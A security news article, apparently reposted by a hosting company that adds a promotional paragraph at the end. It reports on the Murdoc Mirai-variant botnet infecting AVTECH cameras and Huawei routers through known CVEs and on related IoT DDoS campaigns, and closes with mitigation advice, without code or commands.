
Cybersecurity researchers have identified a significant campaign taking advantage of vulnerabilities in AVTECH IP cameras and Huawei HG532 routers, integrating these devices into a variant of the Mirai botnet known as the Murdoc Botnet.
This ongoing effort has been active since at least July 2024, with more than 1,370 systems compromised. The majority of these infections are reported in regions including Malaysia, Mexico, Thailand, Indonesia, and Vietnam.
The botnet exploits known vulnerabilities, such as CVE-2017-17215 and CVE-2024-7029, allowing initial access to Internet of Things (IoT) devices. From there, it downloads a shell script that fetches and executes the botnet malware based on the device’s CPU architecture. The primary objective of these attacks is to leverage the botnet for distributing denial-of-service (DDoS) attacks.
This development follows the emergence of another Mirai variant named gayfemboy, which exploits a recently disclosed security weakness affecting Four-Faith industrial routers since early November 2024. Additionally, earlier in mid-2024, researchers revealed that the CVE-2024-7029 vulnerability was also being exploited to recruit AVTECH devices into a botnet.
Further complicating matters, details have surfaced regarding a large-scale DDoS campaign targeting major Japanese corporations and banks since the end of 2024. This attack utilized an IoT botnet composed of devices compromised through vulnerabilities and weak credentials. Targeted sectors include telecommunications, technology, hosting, cloud computing, banking, gaming, and financial services. Over 55% of the affected devices were located in India, with others in South Africa, Brazil, Bangladesh, and Kenya.
The botnet comprises multiple malware variants derived from Mirai and BASHLITE. Its command capabilities include various DDoS attack methods, malware updates, and proxy services.
To mitigate these risks, it is recommended to monitor for suspicious processes, events, and network traffic stemming from the execution of any untrusted scripts or binaries. Additionally, users should apply firmware updates and change default usernames and passwords to enhance security.
Welcome to DediRock, your trusted partner in high-performance hosting solutions. At DediRock, we specialize in providing dedicated servers, VPS hosting, and cloud services tailored to meet the unique needs of businesses and individuals alike. Our mission is to deliver reliable, scalable, and secure hosting solutions that empower our clients to achieve their digital goals. With a commitment to exceptional customer support, cutting-edge technology, and robust infrastructure, DediRock stands out as a leader in the hosting industry. Join us and experience the difference that dedicated service and unwavering reliability can make for your online presence. Launch our website.